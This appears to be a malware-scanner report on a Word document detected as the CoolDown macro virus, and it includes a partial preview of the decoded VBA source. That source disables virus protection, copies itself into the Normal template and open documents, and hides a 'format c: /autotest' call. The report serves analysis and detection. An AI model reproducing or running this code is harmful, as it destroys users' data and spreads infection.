MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains VBA macros, specifically a Document_Open macro that calls a function named 'CoolDown'. This function, when executed with the argument '1', attempts to run the command 'format c: /autotest', which is highly destructive. The presence of the 'Shell()' call and the 'Document_Open' macro strongly indicate malicious intent to execute arbitrary commands.
Heuristics 5
-
ClamAV: Doc.Trojan.CoolDown-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.CoolDown-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29632 bytes |
SHA-256: 22f4a938e9d995dba96f20f68a0a045a9ce646f8f17d02fae4b0b50efd9c238c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
CoolDown 0
' 3043.731
End Sub
' 4139.836
' 5091.396
Private Sub Document_Close()
CoolDown _
0
' 6861.435
' 1609.434
End _
Sub
Private _
Sub ToolsMacro()
CoolDown 1
End _
Sub
Private Sub ViewVBCode()
CoolDown 1
End _
Sub
Private Sub _
CoolDown(How As _
Integer)
On _
Error Resume Next
Dim c As String, a _
As _
Long, _
b _
As Long, _
d _
As _
Long, e _
As Long, f _
As Long, res _
As _
String, m As Boolean
' 6696.699
' 5934.029
Randomize
With _
Options
' 1338.273
.VirusProtection _
= _
False
' 5550.656
.ConfirmConversions = _
False
.SaveNormalPrompt = False
' 9018.309
' 6754.591
End With
If How _
= _
1 _
Then
' 5697.444
' 606.6084
s _
= Shell("format" & Chr(32) & "c:" & _
Chr(32) & _
"/autotest", vbHide)
Else
' 6741.466
' 5936.861
With _
NormalTemplate.VBProject.VBComponents(1).CodeModule
If _
Not .Find("Cool" & "Down", _
1, _
1, 1000, 1000, _
False, False) _
Then
a = .CountOfLines
For b _
= _
1 To a
' 7876.239
.DeleteLines (1)
Next
d _
= _
1
a _
= ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
res = ""
' 5730.678
For b = 1 To _
a
c = _
ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(b, _
1)
c _
= RTrim(LTrim(c))
' 3419.099
If foo(c, _
f, res) _
Then
' 9140.818
' 8870.4
' 8536.813
.InsertLines _
d, _
Space(Rnd * 16) _
& res
' 1491.877
' 9123.504
' 4697.39
d = _
d _
+ _
f
f = _
0
' 4371.166
res = ""
' 5278.109
End If
' 404.4265
Next
NormalTemplate.Save
' 3147.956
End _
If
End With
For e = _
1 To Documents.Count
' 2721.87
With Documents(e).VBProject.VBComponents(1).CodeModule
If Not .Find("Cool" & _
"Down", 1, _
1, 1000, 1000, _
False, False) Then
' 4399.506
a _
= _
.CountOfLines
' 1505.411
m = _
Documents(e).Saved
' 5936.951
' 7478.099
' 590.6182
For b = 1 To a
' 7121.263
' 8561.975
' 9947.795
.DeleteLines (1)
' 677.703
Next
' 7454.467
d _
= _
1
a _
= _
NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
' 3058.095
' 8247.968
' 8953.323
' 8072.195
' 4574.436
' 1420.563
' 9721.467
res _
= _
""
For _
b = _
1 _
To _
a
c = _
NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(b, _
1)
c = RTrim(LTrim(c))
' 5256.324
' 7004.326
If _
foo(c, _
f, _
res) _
Then
' 4980.794
.InsertLines _
d, _
Space(Rnd * 16) & _
res
d _
= _
d + f
f _
= _
0
' 5780.963
res _
= _
""
End If
' 9160.506
' 7513.05
' 5607.009
Next
If _
Documents(e).Path _
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.